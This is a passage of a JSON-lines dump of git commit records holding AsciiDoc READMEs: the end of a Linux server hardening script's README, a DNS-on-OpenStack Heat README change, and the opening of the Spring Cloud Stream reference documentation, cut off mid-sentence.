<2>\nSYSCTL_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/sysctl.conf' \/\/ <3>\nAUDITD_RULES='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/audit.rules' \/\/ <4>\nLOGROTATE_CONF='https:\/\/raw.githubusercontent.com\/konstruktoid\/hardening\/master\/misc\/logrotate.conf' \/\/ <5>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <6>\nVERBOSE='N' \/\/ <7>\nCHANGEME='' \/\/ <8>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nDEFAULTGRUB='\/etc\/default\/grub'\nDISABLEMNT='\/etc\/modprobe.d\/disablemnt.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH.\n<2> Which group the users have to be member of in order to acess via SSH.\n<3> Stricter sysctl settings.\n<4> Auditd rules.\n<5> Logrotate settings.\n<6> NTP server pool.\n<7> If you want all the details or not.\n<8> Add something just to verify that you actually glanced the code.\n\n=== Function list\n`pre` Script setup +\n`firewall` Enable ufw and allow port 22 from `$FW_ADMIN` +\n`disablenet` Disable misc network protocols +\n`disablemnt` Disable misc file systems +\n`disablemod` Disable misc kernel modules +\n`resolvedconf` Systemd\/resolved.conf +\n`systemdconf` Systemd\/system.conf and Systemd\/user.conf +\n`journalctl` Systemd\/journald.conf and logrotate.conf +\n`timesyncd` Systemd\/timesyncd.conf +\n`coredump` Systemd\/coredump.conf +\n`fstab` \/etc\/fstab, system\/tmp.mount and system\/var-tmp.mount +\n`prelink` Prelink +\n`aptget` Updating the package index and upgrading installed packages +\n`hosts` \/etc\/hosts.allow and \/etc\/hosts.deny +\n`issue` Add message to \/etc\/issue, \/etc\/issue.net, \/etc\/motd +\n`logindefs` \/etc\/login.defs +\n`logindconf` Systemd\/logind.conf +\n`sysctl` \/etc\/sysctl.conf +\n`limitsconf` \/etc\/security\/limits.conf +\n`adduser` \/etc\/adduser.conf and \/etc\/default\/useradd +\n`rootaccess` \/etc\/security\/access.conf and \/etc\/securetty +\n`packages` Installing base packages +\n`apport` Disable apport +\n`rkhunter` Configures rkhunter +\n`sshdconfig` \/etc\/ssh\/sshd_config +\n`password` \/etc\/pam.d\/common-password and \/etc\/pam.d\/common-auth +\n`cron` \/etc\/cron and \/etc\/at +\n`ctrlaltdel` Ctrl-alt-delete +\n`auditd` Auditd +\n`aide` Aide +\n`rhosts` .rhosts +\n`users` Remove users +\n`lockroot` Lock root user account +\n`aptget_clean` Remove unused packages +\n`suid` Remove suid bits +\n`umask` Set umask +\n`path` Modify paths +\n`aa_enforce` Enforce apparmor profiles +\n`aide_post` Create Aide db +\n`aide_timer` Enable daily Aide check +\n`systemddelta` systemd-delta +\n`checkreboot` Check if reboot is required\n\n== Tests\nThere are approximately 275 https:\/\/github.com\/sstephenson\/bats[Bats tests] for most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd tests\/\nsudo bats .\n----\n\n== Recommended reading\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/index.cfm?file=independentlinux.100[CIS Distribution Independent Linux Benchmark v1.0.0] +\nhttp:\/\/iase.disa.mil\/stigs\/os\/unix-linux\/Pages\/index.aspx[Draft Red Hat 7 STIG Version 1, Release 0.1] +\nhttps:\/\/benchmarks.cisecurity.org\/downloads\/show-single\/?file=ubuntu1404.100[CIS Ubuntu 14.04 LTS Server Benchmark v1.0.0] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01cd3e54de622aba1d96d580b9423d5cc246b366","subject":"added documentation, usage and required var checking to script","message":"added documentation, usage and required var checking to script\n","repos":"markllama\/dns-service-heat,markllama\/dns-service-heat","old_file":"README.adoc","new_file":"README.adoc","new_contents":":gitroot: https:\/\/github.com\/markllama\n\n== DNS Service for OpenStack with Heat\n\nThis repository defines a simple distributed DNS service within an\nOpenStack Heat stack. The goal is to de-mystify DNS services and\ndeployments for low level delegated sub-domains. It is NOT to provide\nenterprise scale and quality DNS services.\n\n== Deployment Procedure\n\nThe stack is deployed using a set of Heat templates and an Ansible\nplaybook driven by a BASH script. In the future these will be\ncollapsed so the entire process is driven by Ansible. For now a small\namount of glue code is still required.\n\n=== Get the GIT repository\n\n.Clone the Heat and Ansible repositories\n\n[subs=attributes]\n----\ngit clone {gitroot}\/dns-service-heat.git\ngit clone {gitroot}\/dns-service-playbooks.git\n----\n\n=== Input Values\n\nZONE::\n The DNS zone to be served +\n Type: string +\n Example: `example.com`\n\nDNS_UPDATE_KEY::\n A symmetric key value for dynamic DNS updates +\n Type: string +\n This is a BASE64 encoded MD5 hash, randomly generated by\n `rndc-confgen(8)`.\n\nSERVER_SPEC_FILE::\n The name of a YAML file containing the Nova instance specification values. +\n Example: +\n----\nparameters:\n flavor: m1.small\n image: rhel73\n ssh_user: cloud-user\n----\n\nEXTERNAL_NETWORK_NAME::\n The name of an existing Neutron network in the OSP environment which\n allows inbound and outbound traffic. +\n Type: string +\n Example: public_network\n \n\n","old_contents":":gitroot: https:\/\/github.com\/markllama\n\n== DNS Service for OpenStack with Heat\n\nThis repository defines a simple distributed DNS service within an\nOpenStack Heat stack. The goal is to de-mystify DNS services and\ndeployments for low level delegated sub-domains. It is NOT to provide\nenterprise scale and quality DNS services.\n\n== Deployment Procedure\n\nThe stack is deployed using a set of Heat templates and an Ansible\nplaybook driven by a BASH script. In the future these will be\ncollapsed so the entire process is driven by Ansible. For now a small\namount of glue code is still required.\n\n=== Get the GIT repository\n\n.Clone the Heat and Ansible repositories\n\n[subs=attributes]\n----\ngit clone {gitroot}\/dns-service-heat.git\ngit clone {gitroot}\/dns-service-playbooks.git\n----\n\n=== Input Values\n\nZONE:\n The DNS zone to be served +\n Type: string\n Example: `example.com`\n\nDNS_UPDATE_KEY::\n A symmetric key value for dynamic DNS updates +\n Type: string +\n This is a BASE64 encoded MD5 hash, randomly generated by\n `rndc-confgen(8)`.\n\nSERVER_SPEC_FILE::\n The name of a YAML file containing the Nova instance specification values. +\n Example: +\n\n----\nparameters:\n flavor: m1.small\n image: rhel73\n ssh_user: cloud-user\n----\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51a880b9eeb7e5e32866666ac2a17b993f806901","subject":"pushing generated README","message":"pushing generated README\n","repos":"spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/ Do not edit this file (e.g. go instead to src\/main\/asciidoc)\n\n:github-tag: master\n:github-repo: spring-cloud\/spring-cloud-stream\n:github-raw: https:\/\/raw.githubusercontent.com\/{github-repo}\/{github-tag}\n:github-code: https:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n:toclevels: 8\n:nofooter:\n:sectlinks: true\n\n[partintro]\n--\nThis section goes into more detail about how you can work with Spring Cloud Stream.\nIt covers topics such as creating and running stream applications.\n--\n\n[[spring-cloud-stream-overview-introducing]]\n== Introducing Spring Cloud Stream\n\nSpring Cloud Stream is a framework for building message-driven microservice applications.\nSpring Cloud Stream builds upon Spring Boot to create standalone, production-grade Spring applications and uses Spring Integration to provide connectivity to message brokers.\nIt provides opinionated configuration of middleware from several vendors, introducing the concepts of persistent publish-subscribe semantics, consumer groups, and partitions.\n\nYou can add the `@EnableBinding` annotation to your application to get immediate connectivity to a message broker, and you can add `@StreamListener` to a method to cause it to receive events for stream processing.\nThe following example shows a sink application that receives external messages:\n\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Sink.class)\npublic class VoteRecordingSinkApplication {\n\n public static void main(String[] args) {\n SpringApplication.run(VoteRecordingSinkApplication.class, args);\n }\n\n @StreamListener(Sink.INPUT)\n public void processVote(Vote vote) {\n votingService.recordVote(vote);\n }\n}\n----\n\nThe `@EnableBinding` annotation takes one or more interfaces as parameters (in this case, the parameter is a single `Sink` interface).\nAn interface declares input and output channels.\nSpring Cloud Stream provides the `Source`, `Sink`, and `Processor` interfaces. You can also define your own interfaces.\n\nThe following listing shows the definition of the `Sink` interface:\n\n[source,java]\n----\npublic interface Sink {\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\nThe `@Input` annotation identifies an input channel, through which received messages enter the application.\nThe `@Output` annotation identifies an output channel, through which published messages leave the application.\nThe `@Input` and `@Output` annotations can take a channel name as a parameter.\nIf a name is not provided, the name of the annotated method is used.\n\nSpring Cloud Stream creates an implementation of the interface for you.\nYou can use this in the application by autowiring it, as shown in the following example (from a test case):\n\n[source,java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = VoteRecordingSinkApplication.class)\n@WebAppConfiguration\n@DirtiesContext\npublic class StreamApplicationTests {\n\n @Autowired\n private Sink sink;\n\n @Test\n public void contextLoads() {\n assertNotNull(this.sink.input());\n }\n}\n----\n\n== Main Concepts\n\nSpring Cloud Stream provides a number of abstractions and primitives that simplify the writing of message-driven microservice applications.\nThis section gives an overview of the following:\n\n* <<spring-cloud-stream-overview-application-model,Spring Cloud Stream's application model>>\n* <<spring-cloud-stream-overview-binder-abstraction>>\n* <<spring-cloud-stream-overview-persistent-publish-subscribe-support,Persistent publish-subscribe support>>\n* <<consumer-groups,Consumer group support>>\n* <<partitioning,Partitioning support>>\n* <<spring-cloud-stream-overview-binder-api,A pluggable Binder SPI>>\n\n[[spring-cloud-stream-overview-application-model]]\n=== Application Model\n\nA Spring Cloud Stream application consists of a middleware-neutral core.\nThe application communicates with the outside world through input and output channels injected into it by Spring Cloud Stream.\nChannels are connected to external brokers through middleware-specific Binder implementations.\n\n.Spring Cloud Stream Application\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-with-binder.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n==== Fat JAR\n\nSpring Cloud Stream applications can be run in stand-alone mode from your IDE for testing.\nTo run a Spring Cloud Stream application in production, you can create an executable (or \"`fat`\") JAR by using the standard Spring Boot tooling provided for Maven or Gradle. See the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/howto-build.html#howto-create-an-executable-jar-with-maven[Spring Boot Reference Guide] for more details.\n\n[[spring-cloud-stream-overview-binder-abstraction]]\n=== The Binder Abstraction\n\nSpring Cloud Stream provides Binder implementations for https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-kafka[Kafka] and https:\/\/github.com\/spring-cloud\/spring-cloud-stream-binder-rabbit[Rabbit MQ].\nSpring Cloud Stream also includes a https:\/\/github.com\/spring-cloud\/spring-cloud-stream\/blob\/master\/spring-cloud-stream-test-support\/src\/main\/java\/org\/springframework\/cloud\/stream\/test\/binder\/TestSupportBinder.java[TestSupportBinder], which leaves a channel unmodified so that tests can interact with channels directly and reliably assert on what is received.\nYou can also use the extensible API to write your own Binder.\n\nSpring Cloud Stream uses Spring Boot for configuration, and the Binder abstraction makes it possible for a Spring Cloud Stream application to be flexible in how it connects to middleware.\nFor example, deployers can dynamically choose, at runtime, the destinations (such as the Kafka topics or RabbitMQ exchanges) to which channels connect.\nSuch configuration can be provided through external configuration properties and in any form supported by Spring Boot (including application arguments, environment variables, and `application.yml` or `application.properties` files).\nIn the sink example from the <<spring-cloud-stream-overview-introducing>> section, setting the `spring.cloud.stream.bindings.input.destination` application property to `raw-sensor-data` causes it to read from the `raw-sensor-data` Kafka topic or from a queue bound to the `raw-sensor-data` RabbitMQ exchange.\n\nSpring Cloud Stream automatically detects and uses a binder found on the classpath.\nYou can use different types of middleware with the same code.\nTo do so, include a different binder at build time.\nFor more complex use cases, you can also package multiple binders with your application and have it choose the binder( and even whether to use different binders for different channels) at runtime.\n\n[[spring-cloud-stream-overview-persistent-publish-subscribe-support]]\n=== Persistent Publish-Subscribe Support\n\nCommunication between applications follows a publish-subscribe model, where data is broadcast through shared topics.\nThis can be seen in the following figure, which shows a typical deployment for a set of interacting Spring Cloud Stream applications.\n\n.Spring Cloud Stream Publish-Subscribe\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-sensors.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nData reported by sensors to an HTTP endpoint is sent to a common destination named `raw-sensor-data`.\nFrom the destination, it is independently processed by a microservice application that computes time-windowed averages and by another microservice application that ingests the raw data into HDFS (Hadoop Distributed File System).\nIn order to process the data, both applications declare the topic as their input at runtime.\n\nThe publish-subscribe communication model reduces the complexity of both the producer and the consumer and lets new applications be added to the topology without disruption of the existing flow.\nFor example, downstream from the average-calculating application, you can add an application that calculates the highest temperature values for display and monitoring.\nYou can then add another application that interprets the same flow of averages for fault detection.\nDoing all communication through shared topics rather than point-to-point queues reduces coupling between microservices.\n\nWhile the concept of publish-subscribe messaging is not new, Spring Cloud Stream takes the extra step of making it an opinionated choice for its application model.\nBy using native middleware support, Spring Cloud Stream also simplifies use of the publish-subscribe model across different platforms.\n\n[[consumer-groups]]\n=== Consumer Groups\nWhile the publish-subscribe model makes it easy to connect applications through shared topics, the ability to scale up by creating multiple instances of a given application is equally important.\nWhen doing so, different instances of an application are placed in a competing consumer relationship, where only one of the instances is expected to handle a given message.\n\nSpring Cloud Stream models this behavior through the concept of a consumer group.\n(Spring Cloud Stream consumer groups are similar to and inspired by Kafka consumer groups.)\nEach consumer binding can use the `spring.cloud.stream.bindings.<channelName>.group` property to specify a group name.\nFor the consumers shown in the following figure, this property would be set as `spring.cloud.stream.bindings.<channelName>.group=hdfsWrite` or `spring.cloud.stream.bindings.<channelName>.group=average`.\n\n.Spring Cloud Stream Consumer Groups\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-groups.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nAll groups that subscribe to a given destination receive a copy of published data, but only one member of each group receives a given message from that destination.\nBy default, when a group is not specified, Spring Cloud Stream assigns the application to an anonymous and independent single-member consumer group that is in a publish-subscribe relationship with all other consumer groups.\n\n[[consumer-types]]\n=== Consumer Types\n\nTwo types of consumer are supported:\n\n* Message-driven (sometimes referred to as Asynchronous)\n* Polled (sometimes referred to as Synchronous)\n\nPrior to version 2.0, only asynchronous consumers were supported. A message is delivered as soon as it is available and a thread is available to process it.\n\nWhen you wish to control the rate at which messages are processed, you might want to use a synchronous consumer.\n\/\/ TODO This needs more description. A sentence parallel to the last sentence of the preceding paragraph would help.\n\n[[durability]]\n==== Durability\n\nConsistent with the opinionated application model of Spring Cloud Stream, consumer group subscriptions are durable.\nThat is, a binder implementation ensures that group subscriptions are persistent and that, once at least one subscription for a group has been created, the group receives messages, even if they are sent while all applications in the group are stopped.\n\n[NOTE]\n====\nAnonymous subscriptions are non-durable by nature.\nFor some binder implementations (such as RabbitMQ), it is possible to have non-durable group subscriptions.\n====\n\nIn general, it is preferable to always specify a consumer group when binding an application to a given destination.\nWhen scaling up a Spring Cloud Stream application, you must specify a consumer group for each of its input bindings.\nDoing so prevents the application's instances from receiving duplicate messages (unless that behavior is desired, which is unusual).\n\n[[partitioning]]\n=== Partitioning Support\n\nSpring Cloud Stream provides support for partitioning data between multiple instances of a given application.\nIn a partitioned scenario, the physical communication medium (such as the broker topic) is viewed as being structured into multiple partitions.\nOne or more producer application instances send data to multiple consumer application instances and ensure that data identified by common characteristics are processed by the same consumer instance.\n\nSpring Cloud Stream provides a common abstraction for implementing partitioned processing use cases in a uniform fashion.\nPartitioning can thus be used whether the broker itself is naturally partitioned (for example, Kafka) or not (for example, RabbitMQ).\n\n.Spring Cloud Stream Partitioning\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-partitioning.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\nPartitioning is a critical concept in stateful processing, where it is critical (for either performance or consistency reasons) to ensure that all related data is processed together.\nFor example, in the time-windowed average calculation example, it is important that all measurements from any given sensor are processed by the same application instance.\n\nNOTE: To set up a partitioned processing scenario, you must configure both the data-producing and the data-consuming ends.\n\n== Programming Model\n\nTo understand the programming model, you should be familiar with the following core concepts:\n\n* *Destination Binders:* Components responsible to provide integration with the external messaging systems.\n* *Destination Bindings:* Bridge between the external messaging systems and application provided _Producers_ and _Consumers_ of messages (created by the Destination Binders).\n* *Message:* The canonical data structure used by producers and consumers to communicate with Destination Binders (and thus other applications via external messaging systems).\n\nimage::{github-raw}\/docs\/src\/main\/asciidoc\/images\/SCSt-overview.png[width=800,scaledwidth=\"75%\",align=\"center\"]\n\n=== Destination Binders\n\nDestination Binders are extension components of Spring Cloud Stream responsible for providing the necessary configuration and implementation to facilitate\nintegration with external messaging systems.\nThis integration is responsible for connectivity, delegation, and routing of messages to and from producers and consumers, data type conversion,\ninvocation of the user code, and more.\n\nBinders handle a lot of the boiler plate responsibilities that would otherwise fall on your shoulders. However, to accomplish that, the binder still needs\nsome help in the form of minimalistic yet required set of instructions from the user, which typically come in the form of some type of configuration.\n\nWhile it is out of scope of this section to discuss all of the available binder and binding configuration options (the rest of the manual covers them extensively),\n_Destination Binding_ does require special attention. The next section discusses it in detail.\n\n=== Destination Bindings\n\nAs stated earlier, _Destination Bindings_ provide a bridge between the external messaging system and application-provided _Producers_ and _Consumers_.\n\nApplying the @EnableBinding annotation to one of the application\u2019s configuration classes defines a destination binding.\nThe `@EnableBinding` annotation itself is meta-annotated with `@Configuration` and triggers the configuration of the Spring Cloud Stream infrastructure.\n\nThe following example shows a fully configured and functioning Spring Cloud Stream application that receives the payload of the message from the `INPUT`\ndestination as a `String` type (see <<Content Type Negotiation>> section), logs it to the console and sends it to the `OUTPUT` destination after converting it to upper case.\n\n[source, java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyApplication {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyApplication.class, args);\n\t}\n\n\t@StreamListener(Processor.INPUT)\n\t@SendTo(Processor.OUTPUT)\n\tpublic String handle(String value) {\n\t\tSystem.out.println(\"Received: \" + value);\n\t\treturn value.toUpperCase();\n\t}\n}\n----\n\nAs you can see the `@EnableBinding` annotation can take one or more interface classes as parameters. The parameters are referred to as _bindings_,\nand they contain methods representing _bindable components_.\nThese components are typically message channels (see https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-messaging.html[Spring Messaging])\nfor channel-based binders (such as Rabbit, Kafka, and others). However other types of bindings can\nprovide support for the native features of the corresponding technology. For example Kafka Streams binder (formerly known as KStream) allows native bindings directly to Kafka Streams\n(see https:\/\/docs.spring.io\/autorepo\/docs\/spring-cloud-stream-binder-kafka-docs\/1.1.0.M1\/reference\/htmlsingle\/[Kafka Streams] for more details).\n\nSpring Cloud Stream already provides _binding_ interfaces for typical message exchange contracts, which include:\n\n* *Sink:* Identifies the contract for the message consumer by providing the destination from which the message is consumed.\n* *Source:* Identifies the contract for the message producer by providing the destination to which the produced message is sent.\n* *Processor:* Encapsulates both the sink and the source contracts by exposing two destinations that allow consumption and production of messages.\n\n[source, java]\n----\npublic interface Sink {\n\n String INPUT = \"input\";\n\n @Input(Sink.INPUT)\n SubscribableChannel input();\n}\n----\n\n[source, java]\n----\npublic interface Source {\n\n String OUTPUT = \"output\";\n\n @Output(Source.OUTPUT)\n MessageChannel output();\n}\n----\n\n[source, java]\n----\npublic interface Processor extends Source, Sink {}\n----\n\nWhile the preceding example satisfies the majority of cases, you can also define your own contracts by defining your own bindings interfaces and use `@Input` and `@Output`\nannotations to identify the actual _bindable components_.\n\nFor example:\n\n[source, java]\n----\npublic interface Barista {\n\n @Input\n SubscribableChannel orders();\n\n @Output\n MessageChannel hotDrinks();\n\n @Output\n MessageChannel coldDrinks();\n}\n----\n\nUsing the interface shown in the preceding example as a parameter to `@EnableBinding` triggers the creation of the three bound channels named `orders`, `hotDrinks`, and `coldDrinks`,\nrespectively.\n\nYou can provide as many binding interfaces as you need, as arguments to the `@EnableBinding` annotation, as shown in the following example:\n\n[source, java]\n----\n@EnableBinding(value = { Orders.class, Payment.class })\n----\n\nIn Spring Cloud Stream, the bindable `MessageChannel` components are the Spring Messaging `MessageChannel` (for outbound) and its extension, `SubscribableChannel`,\n(for inbound).\n\n*Pollable Destination Binding*\n\nWhile the previously described bindings support event-based message consumption, sometimes you need more control, such as rate of consumption.\n\nStarting with version 2.0, you can now bind a pollable consumer:\n\nThe following example shows how to bind a pollable consumer:\n\n[source, java]\n----\npublic interface PolledBarista {\n\n @Input\n PollableMessageSource orders();\n\t. . .\n}\n----\n\nIn this case, an implementation of `PollableMessageSource` is bound to the `orders` \u201cchannel\u201d. See <<Using Polled Consumers>> for more details.\n\n*Customizing Channel Names*\n\nBy using the `@Input` and `@Output` annotations, you can specify a customized channel name for the channel, as shown in the following example:\n\n[source, java]\n----\npublic interface Barista {\n @Input(\"inboundOrders\")\n SubscribableChannel orders();\n}\n----\n\nIn the preceding example, the created bound channel is named `inboundOrders`.\n\nNormally, you need not access individual channels or bindings directly (other then configuring them via `@EnableBinding` annotation). However there may be\ntimes, such as testing or other corner cases, when you do.\n\nAside from generating channels for each binding and registering them as Spring beans, for each bound interface, Spring Cloud Stream generates a bean that implements the interface.\nThat means you can have access to the interfaces representing the bindings or individual channels by auto-wiring either in your application, as shown in the following two examples:\n\n_Autowire Binding interface_\n\n[source, java]\n----\n@Autowire\nprivate Source source\n\npublic void sayHello(String name) {\n source.output().send(MessageBuilder.withPayload(name).build());\n}\n----\n\n_Autowire individual channel_\n\n[source, java]\n----\n@Autowire\nprivate MessageChannel output;\n\npublic void sayHello(String name) {\n output.send(MessageBuilder.withPayload(name).build());\n}\n----\n\nYou can also use standard Spring's `@Qualifier` annotation for cases when channel names are customized or in multiple-channel scenarios that require specifically named channels.\n\nThe following example shows how to use the @Qualifier annotation in this way:\n\n[source, java]\n----\n@Autowire\n@Qualifier(\"myChannel\")\nprivate MessageChannel output;\n----\n\n[[spring-cloud-stream-overview-producing-consuming-messages]]\n=== Producing and Consuming Messages\n\nYou can write a Spring Cloud Stream application by using either Spring Integration annotations or Spring Cloud Stream native annotation.\n\n==== Spring Integration Support\n\nSpring Cloud Stream is built on the concepts and patterns defined by http:\/\/www.enterpriseintegrationpatterns.com\/[Enterprise Integration Patterns] and relies\nin its internal implementation on an already established and popular implementation of Enterprise Integration Patterns within the Spring portfolio of projects:\nhttps:\/\/projects.spring.io\/spring-integration\/[Spring Integration] framework.\n\nSo its only natural for it to support the foundation, semantics, and configuration options that are already established by Spring Integration\n\nFor example, you can attach the output channel of a `Source` to a `MessageSource` and use the familiar `@InboundChannelAdapter` annotation, as follows:\n\n[source, java]\n----\n@EnableBinding(Source.class)\npublic class TimerSource {\n\n @Bean\n @InboundChannelAdapter(value = Source.OUTPUT, poller = @Poller(fixedDelay = \"10\", maxMessagesPerPoll = \"1\"))\n public MessageSource<String> timerMessageSource() {\n return () -> new GenericMessage<>(\"Hello Spring Cloud Stream\");\n }\n}\n----\n\nSimilarly, you can use @Transformer or @ServiceActivator while providing an implementation of a message handler method for a _Processor_ binding contract, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n @Transformer(inputChannel = Processor.INPUT, outputChannel = Processor.OUTPUT)\n public Object transform(String message) {\n return message.toUpperCase();\n }\n}\n----\n\nNOTE: While this may be skipping ahead a bit, it is important to understand that, when you consume from the same binding using `@StreamListener` annotation, a pub-sub model is used.\nEach method annotated with `@StreamListener` receives its own copy of a message, and each one has its own consumer group.\nHowever, if you consume from the same binding by using one of the Spring Integration annotation (such as `@Aggregator`, `@Transformer`, or `@ServiceActivator`), those consume in a competing model.\nNo individual consumer group is created for each subscription.\n\n==== Using @StreamListener Annotation\n\nComplementary to its Spring Integration support, Spring Cloud Stream provides its own `@StreamListener` annotation, modeled after other Spring Messaging annotations\n(`@MessageMapping`, `@JmsListener`, `@RabbitListener`, and others) and provides conviniences, such as content-based routing and others.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\npublic class VoteHandler {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Sink.INPUT)\n public void handle(Vote vote) {\n votingService.record(vote);\n }\n}\n----\n\nAs with other Spring Messaging methods, method arguments can be annotated with `@Payload`, `@Headers`, and `@Header`.\n\n\nFor methods that return data, you must use the `@SendTo` annotation to specify the output binding destination for data returned by the method, as shown in the following example:\n\n[source,java]\n----\n@EnableBinding(Processor.class)\npublic class TransformProcessor {\n\n @Autowired\n VotingService votingService;\n\n @StreamListener(Processor.INPUT)\n @SendTo(Processor.OUTPUT)\n public VoteResult handle(Vote vote) {\n return votingService.record(vote);\n }\n}\n----\n\n\n==== Using @StreamListener for Content-based routing\n\nSpring Cloud Stream supports dispatching messages to multiple handler methods annotated with `@StreamListener` based on conditions.\n\nIn order to be eligible to support conditional dispatching, a method must satisfy the follow conditions:\n\n* It must not return a value.\n* It must be an individual message handling method (reactive API methods are not supported).\n\nThe condition is specified by a SpEL expression in the `condition` argument of the annotation and is evaluated for each message.\nAll the handlers that match the condition are invoked in the same thread, and no assumption must be made about the order in which the invocations take place.\n\nIn the following example of a `@StreamListener` with dispatching conditions, all the messages bearing a header `type` with the value `bogey` are dispatched to the\n`receiveBogey` method, and all the messages bearing a header `type` with the value `bacall` are dispatched to the `receiveBacall` method.\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class TestPojoWithAnnotatedArguments {\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bogey'\")\n public void receiveBogey(@Payload BogeyPojo bogeyPojo) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"headers['type']=='bacall'\")\n public void receiveBacall(@Payload BacallPojo bacallPojo) {\n \/\/ handle the message\n }\n}\n----\n\n*Content Type Negotiation in the Context of `condition`*\n\nIt is important to understand some of the mechanics behind content-based routing using the `condition` argument of `@StreamListener`, especially in the context of the type of the message as a whole.\nIt may also help if you familiarize yourself with the <<Content Type Negotiation>> before you proceed.\n\nConsider the following scenario:\n\n[source,java]\n----\n@EnableBinding(Sink.class)\n@EnableAutoConfiguration\npublic static class CatsAndDogs {\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Dog'\")\n public void bark(Dog dog) {\n \/\/ handle the message\n }\n\n @StreamListener(target = Sink.INPUT, condition = \"payload.class.simpleName=='Cat'\")\n public void purr(Cat cat) {\n \/\/ handle the message\n }\n}\n----\n\nThe preceding code is perfectly valid. It compiles and deploys without any issues, yet it never produces the result you expect.\n\nThat is because you are testing something that does not yet exist in a state you expect. That is because the payload of the message is not yet converted from the\nwire format (`byte[]`) to the desired type.\nIn other words, it has not yet gone through the type conversion process described in the <<Content Type Negotiation>>.\n\nSo, unless you use a SPeL expression that evaluates raw data (for example, the value of the first byte in the byte array), use message header-based expressions\n(such as `condition = \"headers['type']=='dog'\"`).\n\n\nNOTE: At the moment, dispatching through `@StreamListener` conditions is supported only for channel-based binders (not for reactive programming)\nsupport.\n\n\n[[_spring_cloud_function]]\n==== Spring Cloud Function support\n\nSince Spring Cloud Stream v2.1, another alternative for defining _stream handlers_ and _sources_ is to use build-in\nsupport for https:\/\/cloud.spring.io\/spring-cloud-function\/[Spring Cloud Function] where they can be expressed as beans of\n type `java.util.function.[Supplier\/Function\/Consumer]`.\n\nTo specify which functional bean to bind to the external destination(s) exposed by the bindings, you must provide `spring.cloud.stream.function.definition` property.\n\nHere is the example of the Processor application exposing message handler as `java.util.function.Function`\n[source,java]\n----\n@SpringBootApplication\n@EnableBinding(Processor.class)\npublic class MyFunctionBootApp {\n\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(MyFunctionBootApp.class, \"--spring.cloud.stream.function.definition=toUpperCase\");\n\t}\n\n\t@Bean\n\tpublic Function<String, String> toUpperCase() {\n\t\treturn s -> s.toUpperCase();\n\t}\n}\n----\nIn the above you we simply define a bean of type `java.util.function.Function` called _toUpperCase_ and identify it as a bean to be used as message handler\nwhose 'input' and 'output' must be bound to the external destinations exposed by the Processor binding.\n\nBelow are the examples of simple functional 